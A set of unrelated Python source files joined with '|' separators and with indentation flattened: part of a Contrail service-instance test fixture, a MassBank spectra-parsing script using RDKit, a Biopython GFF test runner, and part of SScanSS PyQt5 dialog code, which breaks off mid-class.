left_virtual_network=self.left_vn_name,
right_virtual_network=self.right_vn_name)
bridge = False
if 'bridge_svc_instance_1' in self.si_fq_name:
bridge = True
for itf in self.if_list:
if (itf[0] == 'left' and not bridge):
virtual_network = self.left_vn_name
elif (itf[0] == 'right' and not bridge):
virtual_network = self.right_vn_name
else:
virtual_network = ""
if_type = ServiceInstanceInterfaceType(
virtual_network=virtual_network,
static_routes=RouteTableType([RouteType(prefix=self.static_route[self.if_list.index(itf)])]))
if_type.set_static_routes(
RouteTableType([RouteType(prefix=self.static_route[self.if_list.index(itf)])]))
si_prop.add_interface_list(if_type)
else:
if self.left_vn_name:
# In Network mode
si_prop = ServiceInstanceType(
left_virtual_network=self.left_vn_name)
intf_count = 1
virtual_network = self.left_vn_name
else:
# Transparent mode
si_prop = ServiceInstanceType()
intf_count = 1
virtual_network = ""
if self.svc_template.service_template_properties.service_type == 'firewall':
# Transparent mode firewall
intf_count = 3
for i in range(intf_count):
if_type = ServiceInstanceInterfaceType(
virtual_network=virtual_network)
si_prop.add_interface_list(if_type)
si_prop.set_scale_out(ServiceScaleOutType(self.max_inst))
svc_instance.set_service_instance_properties(si_prop)
svc_instance.set_service_template(self.svc_template)
if self.inputs.webui_config_flag:
self.webui.create_svc_instance_in_webui(self)
else:
self.vnc_lib.service_instance_create(svc_instance)
svc_instance = self.vnc_lib.service_instance_read(
fq_name=self.si_fq_name)
return svc_instance
# end _create_si
def _delete_si(self):
self.logger.debug("Deleting service instance: %s", self.si_fq_name)
self.vnc_lib.service_instance_delete(fq_name=self.si_fq_name)
# end _delete_si
def verify_si(self):
"""check service instance"""
self.project = self.vnc_lib.project_read(fq_name=self.project_fq_name)
try:
self.si = self.vnc_lib.service_instance_read(
fq_name=self.si_fq_name)
self.logger.debug(
"Service instance: %s created succesfully", self.si_fq_name)
except NoIdError:
errmsg = "Service instance: %s not found." % self.si_fq_name
self.logger.warn(errmsg)
return (False, errmsg)
return True, None
def verify_st(self):
"""check service template"""
self.cs_si = self.api_s_inspect.get_cs_si(
si=self.si_name, refresh=True)
try:
st_refs = self.cs_si['service-instance']['service_template_refs']
except KeyError:
st_refs = None
if not st_refs:
errmsg = "No service template refs in SI '%s'" % self.si_name
self.logger.warn(errmsg)
return (False, errmsg)
st_ref_name = [st_ref['to'][-1]
for st_ref in st_refs if st_ref['to'][-1] == self.st_name]
if not st_ref_name:
errmsg = "SI '%s' has no service template ref to %s" % (
self.si_name, self.st_name)
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("SI '%s' has service template ref to %s",
self.si_name, self.st_name)
return True, None
@retry(delay=10, tries=15)
def verify_svm(self):
"""check Service VM"""
try:
self.vm_refs = self.cs_si[
'service-instance']['virtual_machine_back_refs']
except KeyError:
self.vm_refs = None
if not self.vm_refs:
errmsg = "SI %s dosent have back refs to Service VM" % self.si_name
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("SI %s has back refs to Service VM", self.si_name)
self.svm_ids = [vm_ref['to'][0] for vm_ref in self.vm_refs]
for svm_id in self.svm_ids:
cs_svm = self.api_s_inspect.get_cs_vm(vm_id=svm_id, refresh=True)
if not cs_svm:
errmsg = "Service VM for SI '%s' not launched" % self.si_name
self.logger.warn(errmsg)
#self.logger.debug("Service monitor status: %s", get_status('contrail-svc-monitor'))
return (False, errmsg)
self.logger.debug("Serivce VM for SI '%s' is launched", self.si_name)
return True, None
def svm_compute_node_ip(self):
admin_project_uuid = self.api_s_inspect.get_cs_project()['project'][
'uuid']
svm_name = self.si_name + str('_1')
svm_obj = self.nova_fixture.get_vm_if_present(
svm_name, admin_project_uuid)
svm_compute_node_ip = self.inputs.host_data[
self.nova_fixture.get_nova_host_of_vm(svm_obj)]['host_ip']
return svm_compute_node_ip
@retry(delay=1, tries=5)
def verify_interface_props(self):
"""check if properties"""
try:
vm_if_props = self.svc_vm_if[
'virtual-machine-interface']['virtual_machine_interface_properties']
except KeyError:
vm_if_props = None
if not vm_if_props:
errmsg = "No VM interface in Service VM of SI %s" % self.si_name
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug(
"VM interface present in Service VM of SI %s", self.si_name)
self.if_type = vm_if_props['service_interface_type']
if (not self.if_type and self.if_type not in self.if_list):
errmsg = "Interface type '%s' is not present in Servcice VM of SI '%s'" % (
self.if_type, self.si_name)
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug(
"Interface type '%s' is present in Service VM of SI '%s'", self.if_type, self.si_name)
return True, None
@retry(delay=1, tries=5)
def verify_vn_links(self):
"""check vn links"""
try:
vn_refs = self.svc_vm_if[
'virtual-machine-interface']['virtual_network_refs']
except KeyError:
vn_refs = None
if not vn_refs:
errmsg = "IF %s has no back refs to vn" % self.if_type
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("IF %s has back refs to vn", self.if_type)
for vn in vn_refs:
self.svc_vn = self.api_s_inspect.get_cs_vn(
vn=vn['to'][-1], refresh=True)
if not self.svc_vn:
errmsg = "IF %s has no vn" % self.if_type
self.logger.warn(errmsg)
return (False, errmsg)
if self.svc_vn['virtual-network']['name'] in self.svn_list:
self.cs_svc_vns.append(vn['to'][-1])
self.logger.debug("IF %s has vn '%s'", self.if_type,
self.svc_vn['virtual-network']['name'])
return True, None
@retry(delay=1, tries=5)
def verify_ri(self):
"""check routing instance"""
try:
ri_refs = self.svc_vm_if[
'virtual-machine-interface']['routing_instance_refs']
except KeyError:
ri_refs = None
vn_name = self.svc_vn['virtual-network']['name']
if not ri_refs:
errmsg = "IF %s, VN %s has no back refs to routing instance" % (
self.if_type, vn_name)
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug(
"IF %s, VN %s has back refs to routing instance", self.if_type, vn_name)
for ri in ri_refs:
svc_ri = self.api_s_inspect.get_cs_ri_by_id(ri['uuid'])
if not svc_ri:
errmsg = "IF %s VN %s has no RI" % (self.if_type, vn_name)
self.logger.warn(errmsg)
return (False, errmsg)
if svc_ri['routing-instance']['name'] in self.svn_list:
self.cs_svc_ris.append(ri['uuid'])
ri_name = svc_ri['routing-instance']['name']
self.logger.debug("IF %s VN %s has RI", self.if_type, vn_name)
if ri_name == vn_name:
continue
else:
if not ri['attr']:
errmsg = "IF %s VN %s RI %s no attributes" % (
self.if_type, vn_name, ri_name)
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("IF %s VN %s RI %s has attributes",
self.if_type, vn_name, ri_name)
# check service chain
sc_info = svc_ri[
'routing-instance']['service_chain_information']
if not sc_info:
errmsg = "IF %s VN %s RI %s has no SCINFO" % (
self.if_type, vn_name, ri_name)
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("IF %s VN %s RI %s has SCINFO",
self.if_type, vn_name, ri_name)
return True, None
def verify_svm_interface(self):
# check VM interfaces
for svm_id in self.svm_ids:
cs_svm = self.api_s_inspect.get_cs_vm(vm_id=svm_id, refresh=True)
svm_ifs = (cs_svm['virtual-machine'].get('virtual_machine_interfaces') or
cs_svm['virtual-machine'].get('virtual_machine_interface_back_refs'))
if len(svm_ifs) != len(self.if_list):
errmsg = "Service VM dosen't have all the interfaces %s" % self.if_list
self.logger.warn(errmsg)
return False, errmsg
svc_vm_if = self.api_s_inspect.get_cs_vmi_of_vm(svm_id, refresh=True)
for self.svc_vm_if in svc_vm_if:
result, msg = self.verify_interface_props()
if not result:
return result, msg
result, msg = self.verify_vn_links()
if not result:
return result, msg
result, msg = self.verify_ri()
if not result:
return result, msg
return True, None
def verify_on_setup(self):
self.report(self.verify_si())
self.report(self.verify_st())
self.report(self.verify_svm())
self.report(self.verify_svm_interface())
return True, None
# end verify_on_setup
def report(self, result):
if type(result) is tuple:
result, errmsg = result
if not result:
assert False, errmsg
@retry(delay=2, tries=15)
def verify_si_not_in_api_server(self):
if not self.si:
return True, None
si = self.api_s_inspect.get_cs_si(si=self.si_name, refresh=True)
if si:
errmsg = "Service instance %s not removed from api server" % self.si_name
self.logger.warn(errmsg)
return False, errmsg
self.logger.debug("Service instance %s removed from api server" %
self.si_name)
return True, None
@retry(delay=5, tries=20)
def verify_svm_not_in_api_server(self):
for svm_id in self.svm_ids:
cs_svm = self.api_s_inspect.get_cs_vm(vm_id=svm_id, refresh=True)
if cs_svm:
errmsg = "Service VM for SI '%s' not deleted" % self.si_name
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("Serivce VM for SI '%s' is deleted", self.si_name)
return True, None
def si_exists(self):
svc_instances = self.vnc_lib.service_instances_list()[
'service-instances']
if len(svc_instances) == 0:
return False
return True
@retry(delay=2, tries=15)
def verify_svn_not_in_api_server(self):
if self.si_exists():
self.logger.info(
"Some Service Instance exists; skip SVN check in API server")
return True, None
for vn in self.cs_svc_vns:
svc_vn = self.api_s_inspect.get_cs_vn(vn=vn, refresh=True)
if svc_vn:
errmsg = "Service VN %s is not removed from api server" % vn
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("Service VN %s is removed from api server", vn)
return True, None
@retry(delay=2, tries=15)
def verify_ri_not_in_api_server(self):
if self.si_exists():
self.logger.info(
"Some Service Instance exists; skip RI check in API server")
return True, None
for ri in self.cs_svc_ris:
svc_ri = self.api_s_inspect.get_cs_ri_by_id(ri)
if svc_ri:
errmsg = "RI %s is not removed from api server" % ri
self.logger.warn(errmsg)
return (False, errmsg)
self.logger.debug("RI %s is removed from api server", ri)
return True, None
def verify_on_cleanup(self):
result = True
result, msg = self.verify_si_not_in_api_server()
assert result, msg
result, msg = self.verify_svm_not_in_api_server()
assert result, msg
if self.do_verify:
result, msg = self.verify_svn_not_in_api_server()
assert result, msg
result, msg = self.verify_ri_not_in_api_server()
assert result, msg
return result
# end verify_on_cleanup
# end SvcInstanceFixture
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 14 12:17:55 2018
@author: darne
"""
from rdkit import Chem
import os
import numpy as np
import pickle
import cirpy
MS_Records = []
MassBank_Folder = os.listdir("C:/Users/darne/MassBank-data")
all_canon_SMILES = []
for subfolder in MassBank_Folder:
if "." in subfolder:
continue
else:
subfolder_path = "C:/Users/darne/MassBank-data" + "/" + subfolder
subfolder_files = os.listdir(subfolder_path) #list of filename strings
EXTENSION = "txt"
for file in subfolder_files:
if not file.endswith(EXTENSION):
continue
else:
textfilepath = subfolder_path + "/" + file
with open(textfilepath) as f:
text = f.read()
mz_list = []
spectrum_data = text.split("PK$PEAK:")[-1]
spectrum_data = spectrum_data.splitlines()
spectrum_data.remove(' m/z int. rel.int.')
spectrum_data.remove('//')
split_spectrum_data = []
for line in spectrum_data:
line = line.split()
mz_entry = (line[0], line[1], line[2])
mz_list.append(mz_entry)
mz_array = np.array(mz_list)
text_lines = text.splitlines()
detail_lines = []
for line in text_lines:
if "CH$SMILES:" in line:
SMILES_text = line[11:]
elif "CH$IUPAC:" in line:
InChI_text = line[10:]
elif "CH$NAME:" in line:
Mol_name = line[9:]
elif (line[0:3] == "AC$") or (line[0:3] == "MS$"):
detail_lines.append(line[3:])
Details = detail_lines
if SMILES_text != "N/A":
mol = Chem.MolFromSmiles(SMILES_text)
if not mol:
continue
else:
canonical_SMILES = Chem.MolToSmiles(mol)
canonical_InChI = Chem.MolToInchi(mol)
elif InChI_text != "N/A":
mol = Chem.MolFromInchi(InChI_text)
if not mol:
continue
else:
canonical_SMILES = Chem.MolToSmiles(mol)
canonical_InChI = Chem.MolToInchi(mol)
else:
SMILES_text = cirpy.resolve(Mol_name, "smiles")
if SMILES_text == None:
InChI_text = cirpy.resolve(Mol_name, "stdinchi")
if InChI_text == None:
continue
else:
mol = Chem.MolFromInchi(InChI_text)
if not mol:
continue
else:
canonical_SMILES = Chem.MolToSmiles(mol)
canonical_InChI = Chem.MolToInchi(mol)
else:
mol = Chem.MolFromSmiles(SMILES_text)
if not mol:
continue
else:
canonical_SMILES = Chem.MolToSmiles(mol)
canonical_InChI = Chem.MolToInchi(mol)
molecule_record = {"Name":Mol_name,
"SMILES":SMILES_text,
"InChI":InChI_text,
"Canonical SMILES":canonical_SMILES,
"Canonical InChI":canonical_InChI,
"m/z Array":mz_array,
"Details":Details
}
MS_Records.append(molecule_record)
MS_Records_pickle = open("MS_Records.pickle", "wb")
pickle.dump(MS_Records, MS_Records_pickle)
MS_Records_pickle.close()
|
#!/usr/bin/env python
"""Test the Bio.GFF module and dependencies
"""
import os
from Bio import MissingExternalDependencyError
# only do the test if we are set up to do it. We need to have MYSQLPASS
# set and have a GFF wormbase installed (see the code in Bio/GFF/__init_.py
if not os.environ.has_key("MYSQLPASS"):
raise MissingExternalDependencyError("Environment is not configured for this test (not important if you do not plan to use Bio.GFF).")
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import Bio.GFF
warnings.resetwarnings()
print "Running Bio.GFF doctests..."
Bio.GFF._test()
print "Bio.GFF doctests complete."
|
import numpy as np
from PyQt5 import QtCore, QtGui, QtWidgets
from sscanss.config import path_for, settings
from sscanss.core.math import Plane, Matrix33, Vector3, clamp, map_range, trunc, VECTOR_EPS
from sscanss.core.geometry import mesh_plane_intersection
from sscanss.core.util import Primitives, DockFlag, StrainComponents, PointType, PlaneOptions, Attributes
from sscanss.ui.widgets import (FormGroup, FormControl, GraphicsView, GraphicsScene, create_tool_button, FormTitle,
create_scroll_area, CompareValidator, GraphicsPointItem, Grid, create_icon)
from .managers import PointManager
class InsertPrimitiveDialog(QtWidgets.QWidget):
"""Provides UI for typing in measurement/fiducial points
:param primitive: primitive type
:type primitive: Primitives
:param parent: Main window
:type parent: MainWindow
"""
dock_flag = DockFlag.Upper
def __init__(self, primitive, parent):
super().__init__(parent)
self.parent = parent
self.parent_model = self.parent.presenter.model
self.parent.scenes.switchToSampleScene()
self.primitive = primitive
self.main_layout = QtWidgets.QVBoxLayout()
self.textboxes = {}
name = self.parent_model.uniqueKey(self.primitive.value)
self.mesh_args = {'name': name}
if self.primitive == Primitives.Tube:
self.mesh_args.update({'outer_radius': 100.000, 'inner_radius': 50.000, 'height': 200.000})
elif self.primitive == Primitives.Sphere:
self.mesh_args.update({'radius': 100.000})
elif self.primitive == Primitives.Cylinder:
self.mesh_args.update({'radius': 100.000, 'height': 200.000})
else:
self.mesh_args.update({'width': 50.000, 'height': 100.000, 'depth': 200.000})
self.createPrimitiveSwitcher()
self.createFormInputs()
button_layout = QtWidgets.QHBoxLayout()
self.create_primitive_button = QtWidgets.QPushButton('Create')
self.create_primitive_button.clicked.connect(self.createPrimiviteButtonClicked)
button_layout.addWidget(self.create_primitive_button)
button_layout.addStretch(1)
self.main_layout.addLayout(button_layout)
self.main_layout.addStretch(1)
self.setLayout(self.main_layout)
self.title = 'Insert {}'.format(self.primitive.value)
self.setMinimumWidth(450)
self.textboxes['name'].setFocus()
def createPrimitiveSwitcher(self):
switcher_layout = QtWidgets.QHBoxLayout()
switcher = create_tool_button(style_name='MenuButton', status_tip='Open dialog for a different primitive')
switcher.setArrowType(QtCore.Qt.DownArrow)
switcher.setPopupMode(QtWidgets.QToolButton.InstantPopup)
switcher.setMenu(self.parent.primitives_menu)
switcher_layout.addStretch(1)
switcher_layout.addWidget(switcher)
self.main_layout.addLayout(switcher_layout)
def createFormInputs(self):
self.form_group = FormGroup()
for key, value in self.mesh_args.items():
pretty_label = key.replace('_', ' ').title()
if key == 'name':
control = FormControl(pretty_label, value, required=True)
control.form_lineedit.textChanged.connect(self.nameCheck)
else:
control = FormControl(pretty_label, value, desc='mm', required=True, number=True)
control.range(0, None, min_exclusive=True)
self.textboxes[key] = control
self.form_group.addControl(control)
if self.primitive == Primitives.Tube:
outer_radius = self.textboxes['outer_radius']
inner_radius = self.textboxes['inner_radius']
outer_radius.compareWith(inner_radius, CompareValidator.Operator.Greater)
inner_radius.compareWith(outer_radius, CompareValidator.Operator.Less)
self.main_layout.addWidget(self.form_group)
self.form_group.groupValidation.connect(self.formValidation)
def nameCheck(self, value):
if self.parent_model.all_sample_key == value:
self.textboxes['name'].isInvalid(f'"{self.parent_model.all_sample_key}" is a reserved name')
def formValidation(self, is_valid):
if is_valid:
self.create_primitive_button.setEnabled(True)
else:
self.create_primitive_button.setDisabled(True)
def createPrimiviteButtonClicked(self):
for key, textbox in self.textboxes.items():
value = textbox.value
self.mesh_args[key] = value
self.parent.presenter.addPrimitive(self.primitive, self.mesh_args)
new_name = self.parent_model.uniqueKey(self.primitive.value)
self.textboxes['name'].value = new_name
class InsertPointDialog(QtWidgets.QWidget):
"""Provides UI for typing in measurement/fiducial points
:param point_type: point type
:type point_type: PointType
:param parent: Main window
:type parent: MainWindow
"""
dock_flag = DockFlag.Upper
def __init__(self, point_type, parent):
super().__init__(parent)
self.parent = parent
self.parent_model = parent.presenter.model
self.parent.scenes.switchToSampleScene()
self.point_type = point_type
self.title = 'Add {} Point'.format(point_type.value)
self.main_layout = QtWidgets.QVBoxLayout()
unit = 'mm'
self.form_group = FormGroup()
self.x_axis = FormControl('X', 0.0, required=True, desc=unit, number=True)
self.y_axis = FormControl('Y', 0.0, required=True, desc=unit, number=True)
self.z_axis = FormControl('Z', 0.0, required=True, desc=unit, number=True)
self.form_group.addControl(self.x_axis)
self.form_group.addControl(self.y_axis)
self.form_group.addControl(self.z_axis)
self.form_group.groupValidation.connect(self.formValidation)
button_layout = QtWidgets.QHBoxLayout()
self.execute_button = QtWidgets.QPushButton(self.title)
self.execute_button.clicked.connect(self.executeButtonClicked)
button_layout.addWidget(self.execute_button)
button_layout.addStretch(1)
self.main_layout.addWidget(self.form_group)
self.main_layout.addLayout(button_layout)
self.main_layout.addStretch(1)
self.setLayout(self.main_layout)
self.setMinimumWidth(450)
def formValidation(self, is_valid):
if is_valid:
self.execute_button.setEnabled(True)
else:
self.execute_button.setDisabled(True)
def executeButtonClicked(self):
point = [self.x_axis.value, self.y_axis.value, self.z_axis.value]
self.parent.presenter.addPoints([(point, True)], self.point_type)
class InsertVectorDialog(QtWidgets.QWidget):
"""Provides UI for adding measurement vectors using a variety of methods
:param parent: Main window
:type parent: MainWindow
"""
dock_flag = DockFlag.Upper
def __init__(self, parent):
super().__init__(parent)
self.parent = parent
self.parent_model = parent.presenter.model
self.parent.scenes.switchToSampleScene()
self.title = 'Add Measurement Vectors'
self.main_layout = QtWidgets.QVBoxLayout()
spacing = 10
self.main_layout.addSpacing(spacing)
self.main_layout.addWidget(QtWidgets.QLabel('Measurement Point:'))
self.points_combobox = QtWidgets.QComboBox()
self.points_combobox.setView(QtWidgets.QListView())
self.main_layout.addWidget(self.points_combobox)
self.updatePointList()
self.main_layout.addSpacing(spacing)
layout = QtWidgets.QHBoxLayout()
alignment_layout = QtWidgets.QVBoxLayout()
alignment_layout.addWidget(QtWidgets.QLabel('Alignment:'))
self.alignment_combobox = QtWidgets.QComboBox()
self.alignment_combobox.setView(QtWidgets.QListView())
self.alignment_combobox.setInsertPolicy(QtWidgets.QComboBox.InsertAtCurrent)
self.updateAlignment()
self.alignment_combobox.activated.connect(self.addNewAlignment)
self.alignment_combobox.currentIndexChanged.connect(self.changeRenderedAlignment)
alignment_layout.addWidget(self.alignment_combobox)
alignment_layout.addSpacing(spacing)
layout.addLayout(alignment_layout)
self.detector_combobox = QtWidgets.QComboBox()
self.detector_combobox.setView(QtWidgets.QListView())
self.detector_combobox.addItems(list(self.parent_model.instrument.detectors.keys()))
if len(self.parent_model.instrument.detectors) > 1:
detector_layout = QtWidgets.QVBoxLayout()
detector_layout.addWidget(QtWidgets.QLabel('Detector:'))
detector_layout.addWidget(self.detector_combobox)
size = self.detector_combobox.iconSize()
self.detector_combobox.setItemIcon(0, create_icon(settings.value(settings.Key.Vector_1_Colour), size))
self.detector_combobox.setItemIcon(1, create_icon(settings.value(settings.Key.Vector_2_Colour), size))
detector_layout.addSpacing(spacing)
layout.addSpacing(spacing)
layout.addLayout(detector_layout)
self.main_layout.addLayout(layout)
self.main_layout.addWidget(QtWidgets.QLabel('Strain Component:'))
self.component_combobox = QtWidgets.QComboBox()
self.component_combobox.setView(QtWidgets.QListView())
strain_components = [s.value for s in StrainComponents]
self.component_combobox.addItems(strain_components)
self.component_combobox.currentTextChanged.connect(self.toggleKeyInBox)
self.main_layout.addWidget(self.component_combobox)
self.main_layout.addSpacing(spacing)
button_layout = QtWidgets.QHBoxLayout()
self.execute_button = QtWidgets.QPushButton(self.title)
self.execute_button.clicked.connect(self.executeButtonClicked)
button_layout.addWidget(self.execute_button)
button_layout.addStretch(1)
self.createKeyInBox()
self.reverse_checkbox = QtWidgets.QCheckBox('Reverse Direction of Vector')
self.main_layout.addWidget(self.reverse_checkbox)
self.main_layout.addSpacing(spacing)
self.main_layout.addLayout(button_layout)
self.main_layout.addStretch(1)
self.setLayout(self.main_layout)
self.parent_model.measurement_points_changed.connect(self.updatePointList)
self.parent_model.measurement_vectors_changed.connect(self.updateAlignment)
self.parent.scenes.rendered_alignment_changed.connect(self.alignment_combobox.setCurrentIndex)
self.setMinimumWidth(450)
def updatePointList(self):
self.points_combobox.clear()
point_list = ['All Points']
point_list.extend(['{}'.format(i+1) for i in range(self.parent_model.measurement_points.size)])
self.points_combobox.addItems(point_list)
def updateAlignment(self):
align_count = self.parent_model.measurement_vectors.shape[2]
if align_count != self.alignment_combobox.count() - 1:
self.alignment_combobox.clear()
alignment_list = ['{}'.format(i + 1) for i in range(align_count)]
alignment_list.append('Add New...')
self.alignment_combobox.addItems(alignment_list)
self.alignment_combobox.setCurrentIndex(self.parent.scenes.rendered_alignment)
def addNewAlignment(self, index):
if index == self.alignment_combobox.count() - 1:
self.alignment_combobox.insertItem(index, '{}'.format(index + 1))
self.alignment_combobox.setCurrentIndex(index)
def changeRenderedAlignment(self, index):
align_count = self.parent_model.measurement_vectors.shape[2]
if 0 <= index < align_count:
self.parent.scenes.changeRenderedAlignment(index)
elif index >= align_count:
self.parent.scenes.changeVisibility(Attributes.Vectors, False)
def toggleKeyInBox(self, selected_text):
strain_component = StrainComponents(selected_text)
if strain_component == StrainComponents.custom:
self.key_in_box.setVisible(True)
self.form_group.validateGroup()
else:
self.key_in_box.setVisible(False)
self.execute_button.setEnabled(True)
def createKeyInBox(self):
self.key_in_box = QtWidgets.QWidget(self)
layout = QtWidgets.QVBoxLayout()
self.form_group = FormGroup(FormGroup.Layout.Horizontal)
self.x_axis = FormControl('X', 1.0, required=True, number=True, decimals=7)
self.x_axis.range(-1.0, 1.0)
self.y_axis = FormControl('Y', 0.0, required=True, number=True, decimals=7)
self.y_axis.range(-1.0, 1.0)
self.z_axis = FormControl('Z', 0.0, required=True, number=True, decimals=7)
self.z_axis.range(-1.0, 1.0)
self.form_group.addControl(self.x_axis)
self.form_group.addControl(self.y_axis)
self.form_group.addControl(self.z_axis)
self.form_group.groupValidation.connect(self.formValidation)
layout.addWidget(self.form_group)
self.key_in_box.setLayout(layout)
self.main_layout.addWidget(self.key_in_box)
self.toggleKeyInBox(self.component_combobox.currentText())
def formValidation(self, is_valid):
self.execute_button.setDisabled(True)
if is_valid:
if np.linalg.norm([self.x_axis.value, self.y_axis.value, self.z_axis.value]) > VECTOR_EPS:
self.execute_button.setEnabled(True)
else:
self.x_axis.validation_label.setText('Bad Normal')
def executeButtonClicked(self):
points = self.points_combobox.currentIndex() - 1
selected_text = self.component_combobox.currentText()
strain_component = StrainComponents(selected_text)
alignment = self.alignment_combobox.currentIndex()
detector = self.detector_combobox.currentIndex()
check_state = self.reverse_checkbox.checkState()
reverse = True if check_state == QtCore.Qt.Checked else False
if strain_component == StrainComponents.custom:
vector = [self.x_axis.value, self.y_axis.value, self.z_axis.value]
else:
vector = None
self.parent.presenter.addVectors(points, strain_component, alignment, detector,
key_in=vector, reverse=reverse)
# New vectors are drawn by the scene manager after function ends
self.parent.scenes._rendered_alignment = alignment
def closeEvent(self, event):
self.parent.scenes.changeRenderedAlignment(0)
event.accept()
class PickPointDialog(QtWidgets.QWidget):
"""Provides UI for selecting measurement points on a cross section of the sample
:param parent: Main window
:type parent: MainWindow
"""
dock_flag = DockFlag.Full
def __init__(self, parent):
super().__init__(parent)
self.parent = parent
self.parent_model = parent.presenter.model
self.parent.scenes.switchToSampleScene()
self.title = 'Add Measurement Points Graphically'
self.setMinimumWidth(500)
self.plane_offset_range = (-1., 1.)
self.slider_range = (-10000000, 10000000)
self.sample_scale = 20
self.path_pen = QtGui.QPen(QtGui.QColor(255, 0, 0), 0)
self.point_pen = QtGui.QPen(QtGui.QColor(200, 0, 0), 0)
self.main_layout = QtWidgets.QVBoxLayout()
self.setLayout(self.main_layout)
button_layout = QtWidgets.QHBoxLayout()
self.help_button = create_tool_button(tooltip='Help', style_name='ToolButton',
status_tip='Display shortcuts for the cross-section view',
icon_path=path_for('question.png'))
self.help_button.clicked.connect(self.showHelp)
self.reset_button = create_tool_button(tooltip='Reset View', style_name='ToolButton',
status_tip='Reset camera transformation of the cross-section view',
icon_path=path_for('refresh.png'))
self.execute_button = QtWidgets.QPushButton('Add Points')
self.execute_button.clicked.connect(self.addPoints)
button_layout.addWidget(self.help_button)
button_layout.addWidget(self.reset_button)
button_layout.addStretch(1)
button_layout.addWidget(self.execute_button)
self.main_layout.addLayout(button_layout)
self.splitter = QtWidgets.QSplitter(QtCore.Qt.Vertical)
self.splitter.setChildrenCollapsible(False)
self.main_layout.addWidget(self.splitter)
self.createGraphicsView()
self.reset_button.clicked.connect(self.view.reset)
self.createControlPanel()
self.prepareMesh()
self.parent_model.sample_changed.connect(self.prepareMesh)
self.parent_model.measurement_points_changed.connect(self.updateCrossSection)
self.initializing = True
def showEvent(self, event):
if self.initializing:
self.view.fitInView(self.view.anchor, QtCore.Qt.KeepAspectRatio)
self.initializing = False
super().showEvent(event)
def closeEvent(self, event):
self.parent.scenes.removePlane()
event.accept()
def prepareMesh(self):
self.mesh = None
samples = self.parent_model.sample
for _, sample in samples.items():
if self.mesh is None:
self.mesh = sample.copy()
else:
self.mesh.append(sample)
self.scene.clear()
self.tabs.setEnabled(self.mesh is not None)
if self.mesh is not None:
self.setPlane(self.plane_combobox.currentText())
else:
self.parent.scenes.removePlane()
self.view.reset()
def updateStatusBar(self, point):
if self.view.rect().contains(point):
transform = self.view.scene_transform.inverted()[0]
scene_pt = transform.map(self.view.mapToScene(point)) / self.sample_scale
world_pt = [scene_pt.x(), scene_pt.y(), -self.old_distance] @ self.matrix.transpose()
cursor_text = f'X: {world_pt[0]:.3f} Y: {world_pt[1]:.3f} Z: {world_pt[2]:.3f}'
self.parent.cursor_label.setText(cursor_text)
else:
self.parent.cursor_label.clear()
def createGraphicsView(self):
self.scene = GraphicsScene(self.sample_scale, self)
self.view = GraphicsView(self.scene)
self.view.mouse_moved.connect(self.updateStatusBar)
self.view.setMinimumHeight(350)
self.splitter.addWidget(self.view)
def createControlPanel(self):
self.tabs = QtWidgets.QTabWidget()
self.tabs.setMinimumHeight(250)
self.tabs.setTabPosition(QtWidgets.QTabWidget.South)
self.splitter.addWidget(self.tabs)
self.createPlaneTab()
self.createSelectionToolsTab()
self.createGridOptionsTab()
point_manager = PointManager(PointType.Measurement, self.parent)
self.tabs.addTab(create_scroll_area(point_manager), 'Point Manager')
def createPlaneTab(self):
layout = QtWidgets.QVBoxLayout()
layout.addWidget(QtWidgets.QLabel('Specify Plane:'))
self.plane_combobox = QtWidgets.QComboBox()
self.plane_combobox.setView(QtWidgets.QListView())
self.plane_combobox.addItems([p.value for p in PlaneOptions])
self.plane_combobox.currentTextChanged.connect(self.setPlane)
self.createCustomPlaneBox()
layout.addWidget(self.plane_combobox)
layout.addWidget(self.custom_plane_widget)
layout.addSpacing(20)
slider_layout = QtWidgets.QHBoxLayout()
slider_layout.addWidget(QtWidgets.QLabel('Plane Distance from Origin (mm):'))
self.plane_lineedit = QtWidgets.QLineEdit()
validator = QtGui.QDoubleValidator(self.plane_lineedit)
validator.setNotation(QtGui.QDoubleValidator.StandardNotation)
validator.setDecimals(3)
self.plane_lineedit.setValidator(validator)
self.plane_lineedit.textEdited.connect(self.updateSlider)
self.plane_lineedit.editingFinished.connect(self.movePlane)
slider_layout.addStretch(1)
slider_layout.addWidget(self.plane_lineedit)
layout.addLayout(slider_layout)
self.plane_slider = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self.plane_slider.setMinimum(self.slider_range[0])
self.plane_slider.setMaximum(self.slider_range[1])
self.plane_slider.setFocusPolicy(QtCore.Qt.StrongFocus)
self.plane_slider.setSingleStep(1)
self.plane_slider.sliderMoved.connect(self.updateLineEdit)
self.plane_slider.sliderReleased.connect(self.movePlane)
layout.addWidget(self.plane_slider)
layout.addStretch(1)
plane_tab = QtWidgets.QWidget()
plane_tab.setLayout(layout)
self.tabs.addTab(create_scroll_area(plane_tab), 'Define Plane')
def createSelectionToolsTab(self):
layout = QtWidgets.QVBoxLayout()
selector_layout = QtWidgets.QHBoxLayout()
selector_layout.addWidget(QtWidgets.QLabel('Select Geometry of Points: '))
self.button_group = QtWidgets.QButtonGroup()
self.button_group.buttonClicked[int].connect(self.changeSceneMode)
self.object_selector = create_tool_button(checkable=True, checked=True, tooltip='Select Points',
status_tip='Select movable points from the cross-section view',
style_name='MidToolButton', icon_path=path_for('select.png'))
self.point_selector = create_tool_button(checkable=True, tooltip='Draw a Point',
status_tip='Draw a single point at the selected position',
style_name='MidToolButton', icon_path=path_for('point.png'))
self.line_selector = create_tool_button(checkable=True, tooltip='Draw Points on Line',
status_tip='Draw equally spaced points on the selected line',
style_name='MidToolButton', icon_path=path_for('line_tool.png'))
self.area_selector = create_tool_button(checkable=True, tooltip='Draw Points on Area',
status_tip='Draw a grid of points on the selected area',
style_name='MidToolButton', icon_path=path_for('area_tool.png'))
self.button_group.addButton(self.object_selector, GraphicsScene.Mode.Select.value)
self.button_group.addButton(self.point_selector, GraphicsScene.Mode.Draw_point.value)
